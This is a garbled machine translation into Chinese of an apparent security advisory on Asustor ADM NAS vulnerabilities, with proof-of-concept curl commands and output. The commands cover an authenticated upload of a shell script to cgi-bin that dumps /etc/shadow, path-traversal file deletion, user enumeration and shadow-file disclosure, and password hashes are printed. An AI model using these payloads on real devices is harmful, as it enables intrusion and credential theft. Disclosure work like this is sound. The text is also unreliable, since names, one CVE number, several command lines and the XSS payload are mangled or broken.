视图全部解决方案[R1]多运算数据主易变性
高位简表
在研究Asstor As-202TNAS时,可租性发现多重漏洞
CVE-2018-15694认证文件上传
认证远程非行政攻击者可以在目标文件系统任何地方上传文件目标总是命名上传文件WallPaper_1.j.ifweb服务器特征启动后远程非认证攻击者可写字实现远程代码执行/cgi-bin/
excell-k-xPOST-HCente-Type:多段/格式数据boundary=-pwned-' --data-binary $'-pwned-\x0d\x0aContent-Disposition: form-data!filename=\"1.jpg\"\x0d\x0a\x0d\x0a#!/bin/sh\x0aecho -e \"Content-Type: text/plain\\n\\n\";id;uname -a;cat /etc/shadow\x0d\x0a-pwned-\x0d\x0a' $'https://192.168.1.10:8001/portal/apis/wallpaper/uploadwallpaper.cgi?sid=9dpDW4U9jUm.2HNb&act=upload&appdirpath=../../../share/Web/cgi-bin/' { "success": true } $ curl -k http://192.168.1.10:80/cgi-bin/WallPaper_1.jpg uid=999(admin) gid=999(administrators) groups=100(users),997(nvradmins),999(administrators) Linux Clarke 3.10.70 #1 SMP Wed Jun 13 01:06:06 CST 2018 armv7l GNU/Linux root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7::: avahi:*:15259:0:99999:7::: ...
CVE-2018-15695认证任意文件删除
认证远程非行政用户可删除文件系统上的任何文件,原因是路径遍历易懂墙纸.cgi.
$ curl -k "https://192.168.1.10:8001/portal/apis/wallpaper/wallpaper.cgi?sid=2LEyW3.EhAYUCWVF&act=removewallpaper&appdirpath=../../../tmp&file=test.file" { "success": true }
CVE-2018-15696认证账户编号
认证远程非行政用户可以通过设备登录所有账号user.cgi.
$ curl -s -k "https://192.168.1.10:8001/portal/apis/accessControl/user.cgi?sid=C8wyW20b6wYUz31g&act=list&start=0&limit=0&domain=0" | python -m json.tool { "datas": [ { "description": "guest", "email": "", "group": "-", "name": "guest", "primary_gid": 65534, "status": "Inactive", "uid": 998 }, { "description": "Admin", "email": "", "group": "administrators", "name": "admin", "primary_gid": 999, "status": "Active", "uid": 999 }, { "description": "", "email": "", "group": "users", "name": "courtney", "primary_gid": 100, "status": "Active", "uid": 1000 }, { "description": "", "email": "", "group": "users", "name": "lab", "primary_gid": 100, "status": "Active", "uid": 1001 } ], "success": true, "total": 4 }
CVE-2018-15697认证文件披露
认证远程非行政用户可访问NAS共享文件,在请求中指定全文件路径downloadwallpaper.cgi.下例中,bash历史文件取自/Home/admin/.
exstat-anNetstat-aNetstat51417tcpp
CVE-2018-15698认证文件披露
远程认证行政用户通过向远程目标发送请求读取文件内容日志.cgi.
$ curl -k "https://192.168.1.10:8001/portal/apis/settings/loginimage.cgi?sid=4K4yW-gqeQazweZ0&act=preview&file=/etc/shadow" root:$1$WRyOw/55$eN4aG9y2Mc6GFsQ1SMLSm.:17599:0:99999:7:::
CVE-2018-1569:MITMXSS
远程行政用户先认证NAS执行awget大全至http://update.asustor.com/adm_update.php?architecture=armv7l&model=AS1004T&version=3.1.0.RFQ3&initialized=true并剖析结果.conf文件.下举示例文件 :
模型Name = AS10XXT版本 = 3.1.4.RID1发布日期= 2018/06/14发布注
中间人可以修改版本字段以注入窃取管理员证书的Jaavascript例举 :
版本=pnme
TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响
可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案
关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码
如有问题或更正,请发邮件[email protected]
风险信息
可租咨询ID
TRA-2018-22
信用
安德鲁欧尔
sv2基础/时间评分
8.5/6.7
sv2向量
AV:N/AC:M/Au:S/C:C/I:C/A:C
受影响产品
Asstor数据主数3.1.5和
风险因子
高位